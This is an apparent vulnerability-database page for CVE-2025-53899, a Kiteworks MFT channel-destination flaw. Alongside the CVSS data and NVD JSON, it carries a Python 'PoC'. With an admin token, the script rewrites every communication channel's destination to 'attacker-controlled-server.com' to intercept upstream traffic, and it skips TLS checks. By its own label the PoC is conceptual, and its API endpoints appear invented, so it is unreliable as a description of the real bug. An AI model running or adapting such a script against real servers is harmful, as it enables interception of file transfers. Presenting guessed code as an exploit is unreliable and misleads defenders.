CVE-2025-53899

Description

Kiteworks MFT orchestrates end-to-end file transfer workflows. Prior to version 9.1.0, the back-end of Kiteworks MFT is vulnerable to an incorrectly specified destination in a communication channel which allows an attacker with administrative privileges on the system under certain circumstances to intercept upstream communication which could lead to an escalation of privileges. This issue has been patched in version 9.1.0.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:accellion:kiteworks_managed_file_transfer:*:*:*:*:*:*:*:* - VULNERABLE

Kiteworks MFT < 9.1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-53899 PoC - Kiteworks MFT Communication Channel Misconfiguration
# Note: This PoC demonstrates the conceptual exploitation approach
# Actual exploitation requires authenticated admin access

import requests
import json

TARGET = "https://vulnerable-kiteworks-server.com"
ADMIN_TOKEN = "your-admin-auth-token"

def check_vulnerability():
    """Check if target is vulnerable to CVE-2025-53899"""
    headers = {
        "Authorization": f"Bearer {ADMIN_TOKEN}",
        "Content-Type": "application/json"
    }
    
    # Check Kiteworks MFT version
    version_url = f"{TARGET}/api/v1/system/info"
    response = requests.get(version_url, headers=headers, verify=False)
    
    if response.status_code == 200:
        version_info = response.json()
        version = version_info.get("version", "")
        
        # Check if version is before 9.1.0
        if version and tuple(map(int, version.split('.')[:2])) < (9, 1):
            print(f"[+] Target is running vulnerable version: {version}")
            return True
        else:
            print(f"[-] Target is patched (version {version})")
            return False
    
    return False

def exploit_misconfiguration():
    """Exploit the communication channel misconfiguration"""
    headers = {
        "Authorization": f"Bearer {ADMIN_TOKEN}",
        "Content-Type": "application/json"
    }
    
    # Enumerate communication channel configurations
    channels_url = f"{TARGET}/api/v1/channels"
    response = requests.get(channels_url, headers=headers, verify=False)
    
    if response.status_code == 200:
        channels = response.json()
        print(f"[+] Found {len(channels)} communication channels")
        
        for channel in channels:
            channel_id = channel.get("id")
            destination = channel.get("destination")
            print(f"[INFO] Channel {channel_id}: destination = {destination}")
            
            # Attempt to modify channel destination (requires admin)
            modify_url = f"{TARGET}/api/v1/channels/{channel_id}"
            malicious_dest = "attacker-controlled-server.com"
            
            modify_data = {
                "destination": malicious_dest
            }
            
            response = requests.put(modify_url, json=modify_data, headers=headers, verify=False)
            
            if response.status_code == 200:
                print(f"[+] Successfully modified channel {channel_id} destination")
                print(f"[+] Communication will now be redirected to: {malicious_dest}")
                return True
    
    return False

if __name__ == "__main__":
    print("CVE-2025-53899 - Kiteworks MFT Privilege Escalation via Channel Misconfiguration")
    print("=" * 80)
    
    if check_vulnerability():
        print("[*] Target appears vulnerable, attempting exploitation...")
        exploit_misconfiguration()
    else:
        print("[*] Target is not vulnerable or not accessible")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-53899
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-53899
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-53899/
[4] VulDB https://vuldb.com/cve/CVE-2025-53899
[5] https://github.com/kiteworks/security-advisories/security/advisories/GHSA-5gx5-vcpp-8cr5

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-53899", "sourceIdentifier": "[email protected]", "published": "2025-11-29T03:15:58.817", "lastModified": "2025-12-03T17:48:48.890", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kiteworks MFT orchestrates end-to-end file transfer workflows. Prior to version 9.1.0, the back-end of Kiteworks MFT is vulnerable to an incorrectly specified destination in a communication channel which allows an attacker with administrative privileges on the system under certain circumstances to intercept upstream communication which could lead to an escalation of privileges. This issue has been patched in version 9.1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-941"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:accellion:kiteworks_managed_file_transfer:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.1.0", "matchCriteriaId": "795C3F91-729E-4363-9C52-1C9C7CBAD284"}]}]}], "references": [{"url": "https://github.com/kiteworks/security-advisories/security/advisories/GHSA-5gx5-vcpp-8cr5", "source": "[email protected]", "tags": ["Patch", "Third Party Advisory"]}]}}